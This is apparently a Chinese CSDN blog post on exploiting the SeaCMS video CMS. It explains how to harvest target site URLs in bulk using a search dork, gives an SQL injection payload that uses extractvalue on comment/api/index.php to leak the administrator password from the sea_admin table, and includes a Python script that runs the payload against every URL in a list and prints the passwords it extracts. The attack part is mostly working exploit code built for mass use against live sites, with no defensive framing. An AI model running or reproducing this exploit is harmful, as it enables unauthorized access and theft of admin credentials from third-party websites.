海洋seacms漏洞利用

最新推荐文章于 2024-05-20 08:43:25 发布
最新推荐文章于 2024-05-20 08:43:25 发布
阅读量3k 收藏 1
点赞数
文章标签: python 安全漏洞 安全 cms
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/105567015
版权

0x001-url采集
通过对海洋cms源码研究,找出含有标志性的网站目录(search.php?searchtype=),然后利用url采集工具批量采集seacms网站

在这里插入图片描述
0x002-漏洞payload
payload:/`comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27

0x003-exp制作

import requests
import re
urls = open("url.txt","r")
a = []
for url in urls:
    url1 = url.strip()
    a.append(url1)
urls.close()
aa = list(set(a))
with open("url.txt","w") as f:
    result = "\n".join(aa)
    f.write(result)
urls = open("url.txt", "r")
exp = '/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`'
pattern = re.compile("error: '(.*?)'")
for url in urls:
    try:
        target = url.strip() + exp
        html = requests.get(target).text
        if "seacms" in html:
            print(target)
            print("该url存在漏洞:"+url)
            print(re.search(pattern,html).group(1))
    except Exception as e:
        pass

0x004-exp的使用效果*
在这里插入图片描述

Henry404s
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
海洋CMS 影视管理系统
09-26
海洋CMS 影视管理系统,海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,灵活,方便,人性化设计简单易用是最大的特色,是快速架设视频网站首选,只需5分钟即可建立一个海量的视频讯息的行业网站。 海洋cms采用PHP+MYSQL架构,原生PHP代码带来卓越的访问速度和负载能力免去您的后顾之优。海洋cms支持一键转换原max的模板和数据,实现网站无缝迁移到新平台。众多人性化功能设计,超前定时执行任务,让您处理数据得心应手,您只需要专心做内容运营,其它的交给我们。 为符合SEO要求开发大量功能,比如百度结构化数据生成,搜索引擎地图等。全新设计的专题管理,同时支持按分类 扩展分类 剧情分类三种分类模式组合,让网站内容与众不同。简单易用丰富的模板标签,方便网站模板设计制作,让网站更显专业。 海洋cms是基于PHP+MySql技术开发的开源CMS,完全开源 、没有任何加密代码,强劲功能、卓越性能、安全健壮。超级易用、模板众多、插件齐全、资源丰富。构架稳健,平滑升级。
seacms_CNVD-2020-22721_v10.1漏洞分析与复现
一个努力学习网安的小牛马
10-27 910
seacms漏洞复现详情
熊海CMS代码审计/熊海CMS代码审计_0基础黑客知识点
最新发布
程序员三九的博客
05-20 977
我正在参加「掘金·启航计划」前言熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。作为一个早期的系统,里面代码存在许多漏洞利用
seacms海洋cms漏洞
YouthBelief的博客
10-29 5460
seacms海洋cms漏洞前言一、seacms 远程命令执行 (CNVD-2020-22721)0x01 漏洞描述0x02 漏洞利用拿shell总结 前言 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 一、seacms 远程命令执行 (CNVD-2020-22721) 0x01 漏洞描述 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 后台
主机渗透——CRC_3_PENTEST_2_WORDPRESS
B_roin的博客
02-15 1219
1. 该题使用的是wordpress框架,可以利用WPScan进行扫描 注意:带着token才能扫描出漏洞 WPScan的使用教程可以参考:https://blog.csdn.net/guo15890025019/article/details/118548932 在这里利用mailpress插件的命令执行漏洞,越权执行命令 2. 利用漏洞 http:// IP地址 /wp-content/plugins/mailpress/mp-includes/action.php 利用hackbar或者burp su
WEB漏洞之:海洋CMS代码执行(CNVD-2020-22721)
一位热爱网安的年轻人的博客
11-18 1509
web安全漏洞复现之:海洋cms远程代码执行
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 5941
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
海洋seacms中超酷ckplayer自动下一集代码。
03-17
海洋SEACMS中集成CKPlayer,可以为用户提供流畅、交互性强的视频观看体验。而"超酷ckplayer自动下一集代码"则是针对CKPlayer进行的一种定制化设置,目的是在用户观看完一个视频后,无需手动操作就能自动播放下一集...
海洋cms V6.57.zip_seacms_zip_海洋
09-21
seacms 6.57 .zip full
海洋cms V6.53.zip_full_seacms_海洋CMS
09-15
seacms v6.53 full update
seacms海洋影视管理系统 v6.53
11-29
seacms海洋影视管理系统 v6.53 更新日志 新增:微信公众平台模块优化:采集逻辑修复:部分文字描述错误 seacms海洋影视管理系统简介 海洋影视管理系统 (seacms,海洋cms)是一套专为不同
seacms 海洋视频内容管理系统 v6.58
11-26
海洋视频内容管理系统(seacms)是一款专门针对视频点播需求设计的管理软件,其核心功能在于帮助用户快速搭建和管理视频网站。该系统以其灵活性、便利性和人性化的设计著称,使得即便是没有太多技术背景的用户也能在...
【漏洞复现-seaCms-命令执行】vulfocus/seacms-cnvd_2020_22721
10-15 1639
seaCms-命令执行】后门代码写入可解析文件中
[漏洞复现]seacms(v6.53)代码执行漏洞
Vicl1fe的博客
12-30 3015
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://blog.csdn.net/weixin_44897902/article/details/100853036 https://www.jianshu.com/p/a3a18f233184?tdsourcetag=s_pctim_aiomsg 环境: 链接:https://pan.ba...
seacms 远程命令执行 (CNVD-2020-22721)
小小猪的博客
12-30 2202
seacms 远程命令执行 (CNVD-2020-22721) 漏洞简介: 海洋CMS一套程序自适应电脑、手机、平板、APP多个终端入口。 SeaCMS v10.1存在命令执行漏洞,在w1aqhp/admin_ip.php下第五行使用set参数,对用户输入没有进行任何处理,直接写入文件。攻击者可利用该漏洞执行恶意代码,获取服务器权限。 环境搭建: 登录后台,账号admin,密码admin 访问后台IP安全设置网页 burp进行抓包,后面拼接一句话命名 POST /manager/ad..
2021年网络空间安全web题目
qq_57147160的博客
11-19 2136
首先这道题目与ctf还是有点关系的,首先看一下题目: 通过浏览器访问http://靶机服务器IP/1,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/2,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内容作为flag值并提交;(2分) 通过浏览器访问http://靶机服务器IP/3,对该页面进行渗透测试, 找到flag格式:flag{Xxxx123},括号中的内
网站漏洞检测 之后台php语句拼接webshell漏洞
网站安全专家
08-24 703
临近9月底,seacms官方升级海洋cms系统到9.95版本,我们SINE安全在对其源码进行网站漏洞检测的时候发现问题,可导致全局变量被覆盖,后台可以存在越权漏洞并绕过后台安全检测直接登录管理员账号。关于该漏洞的具体详情,我们来详细的分析一下: seacms主要设计开发针对于互联网的站长,以及中小企业的一个建站系统,移动互联网的快速发展,该系统可自动适应电脑端,手机端,平板端,APP端等多个用户...
信息安全 php获取flag,hack - PHP的信息安全(入侵获取$flag)的题目【Q1】
weixin_36487445的博客
03-20 473
地址:http://202.120.7.133:8888/collision.php正在参加ISG比赛,额,反正也是得奖无望了,不过作为一名PHPer,喵的我真心感觉这代码没问题啊。。。求大神解惑。如何获取$flag。。。回复内容:地址:http://202.120.7.133:8888/collision.php正在参加ISG比赛,额,反正也是得奖无望了,不过作为一名PHPer,喵的我真心感觉这...
seacms最新版前台getshell
weixin_34025051的博客
06-10 165
cms版本:6.45,这是做一道ctf题目遇到的 实际上知道漏洞之后,题目并不难,记录的原因是。。。。payload一句话花了我一个小时。。 orz,不知道在干嘛,就是一直不成功! 漏洞原文 直接说题目,有了poc之后,我们试着写进去一句话 根据poc构造我们的paylaod }{end if}{if:1)print_r($_POST[func]($_POST[cmd]));//}{end...
Numerical Models of Oceans and Oceanic Processes
08-11
海洋海洋过程数值模式 Lakshmi H. Kantha, Carol Anne Clayson著 Acadamic Press. 2000年版 计算流体力学领域经典图书!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值